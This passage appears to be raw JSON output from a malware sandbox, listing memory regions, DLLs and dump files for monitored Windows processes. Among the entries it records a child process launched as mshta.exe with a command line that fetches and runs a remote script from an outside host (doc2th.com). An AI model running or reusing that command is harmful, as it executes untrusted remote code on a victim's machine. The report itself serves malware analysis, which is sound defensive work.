1 }, "end_va": 4071423, "entry_point": 0, "filename": null, "id": "region_409", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:00:24.041", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000410-addr_0x0000000001800000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 25165824, "type": "region", "version": 1 }, "end_va": 25690111, "entry_point": 0, "filename": null, "id": "region_410", "name": "private_0x0000000001800000", "norm_filename": null, "region_type": "private_memory", "start_va": 25165824, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000411-addr_0x0000000001d00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_411", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000412-addr_0x0000000001e00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 
31457280, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_412", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33292287, "entry_point": 32505856, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_413", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 32505856, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000414-addr_0x00000000020c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 34603007, "entry_point": 0, "filename": null, "id": "region_414", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_415", "name": "dwmapi.dll", 
"norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000416-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_416", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000417-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_417", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:24.043", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "mShta http://doc2th.com/tin/foobaz.txt &AAAA\u0012\fC", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_3", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": 
"monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000418-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_418", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_419", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_420", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ 
"readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2879487, "entry_point": 2818048, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_421", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000422-addr_0x0000000000310000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_422", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_423", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, 
"entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_424", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_425", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000426-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_426", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000427-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 
2147352575, "entry_point": 0, "filename": null, "id": "region_427", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000428-addr_0x00000000000f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_428", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:24.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_429", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:24.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_430", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", 
"region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:24.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_431", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_432", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_433", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_434", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_435", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_436", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": 
"region_437", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000438-addr_0x0000000000590000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5898239, "entry_point": 0, "filename": null, "id": "region_438", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:00:24.592", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000439-addr_0x0000000000410000-size_0x0000000000150000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1376256, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_439", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:24.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5992448, "start_va": 1662320640, "type": "region", "version": 1 }, "end_va": 1668313087, "entry_point": 1662320640, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_440", "name": "mshtml.dll", "norm_filename": 
"c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 1662320640, "timestamp": "00:00:25.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1997602816, "type": "region", "version": 1 }, "end_va": 1997623295, "entry_point": 1997602816, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_441", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1997602816, "timestamp": "00:00:25.949", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_442", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:25.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_443", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:25.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 
dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_444", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:25.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_445", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:25.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_446", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:25.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985765375, 
"entry_point": 1984495616, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_447", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:00:25.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1993277440, "type": "region", "version": 1 }, "end_va": 1994280959, "entry_point": 1993277440, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_448", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1993277440, "timestamp": "00:00:25.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_449", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:00:25.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1969291264, "type": "region", "version": 1 }, "end_va": 1971367935, "entry_point": 1969291264, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_450", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", 
"start_va": 1969291264, "timestamp": "00:00:25.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_451", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:25.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965281279, "entry_point": 1964113920, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_452", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:00:25.954", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1964048384, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1964048384, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_453", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1964048384, "timestamp": "00:00:25.954", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1856634880, "type": "region", "version": 1 }, "end_va": 1856806911, "entry_point": 1856634880, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_454", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 1856634880, "timestamp": "00:00:25.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_455", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:00:25.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 118784, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 905215, "entry_point": 786432, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_456", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:00:26.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5079039, "entry_point": 0, "filename": null, "id": "region_457", "name": 
"pagefile_0x0000000000410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4259840, "timestamp": "00:00:26.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000458-addr_0x0000000000550000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_458", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:00:26.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_460", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:26.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_461", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:26.007", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 6950911, "entry_point": 0, "filename": null, "id": "region_462", "name": "pagefile_0x00000000005a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5898240, "timestamp": "00:00:26.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 19595263, "entry_point": 0, "filename": null, "id": "region_463", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:00:26.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_464", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:26.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", 
